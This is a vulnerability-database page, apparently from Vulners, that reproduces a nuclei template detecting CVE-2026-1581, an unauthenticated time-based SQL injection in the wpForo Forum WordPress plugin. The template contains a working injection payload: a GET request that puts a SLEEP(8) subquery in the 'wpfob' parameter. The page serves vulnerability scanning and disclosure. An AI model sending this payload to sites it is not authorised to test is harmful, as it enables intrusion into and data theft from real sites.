Lucene search
K

wpForo Forum <= 2.4.14 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

wpForo Forum plugin has unauthenticated time-based SQL injection via wpfob; update.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-1581
27 Feb 202613:52
githubexploit
Circl
CVE-2026-1581
19 Feb 202618:02
circl
CNNVD
WordPress plugin wpForo Forum SQL注入漏洞
19 Feb 202600:00
cnnvd
CVE
CVE-2026-1581
19 Feb 202616:24
cve
Cvelist
CVE-2026-1581 wpForo Forum <= 2.4.14 - Unauthenticated Time-Based SQL Injection
19 Feb 202616:24
cvelist
NVD
CVE-2026-1581
19 Feb 202617:24
nvd
Patchstack
WordPress wpForo Forum plugin <= 2.4.14 - Unauthenticated Time-Based SQL Injection vulnerability
20 Feb 202607:32
patchstack
Positive Technologies
PT-2026-20865
19 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2026-1581
20 Feb 202619:39
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2026-1581
20 Feb 202600:00
vulncheck_kev
Rows per page
id: CVE-2026-1581

info:
  name: wpForo Forum <= 2.4.14 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    wpForo Forum WordPress plugin <= 2.4.14 contains a time-based SQL injection caused by insufficient escaping of the 'wpfob' parameter, letting unauthenticated attackers extract sensitive database information.
  impact: |
    Unauthenticated attackers can extract sensitive information from the database, leading to data disclosure.
  remediation: |
    Update to the latest version of wpForo Forum plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-2414-unauthenticated-time-based-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1581
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-1581
    epss-score: 0.01727
    epss-percentile: 0.74794
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/wpforo/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,wpforo,unauth,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /community/recent/?wpfob=(SELECT/**/1/**/FROM/**/(SELECT/**/SLEEP(8))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains(body, "wpforo-wrap")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a0047304502203e688069448e7d658822510e27298bbd3ff9da8ad8105a0e1668ff915f5ec3c3022100c6b908392f3ebb4a78a590ad2fddad603b15dd62d20c0cd45a0f5dfcf01faf64:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2026 19:09Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
EPSS0.01727
SSVC
15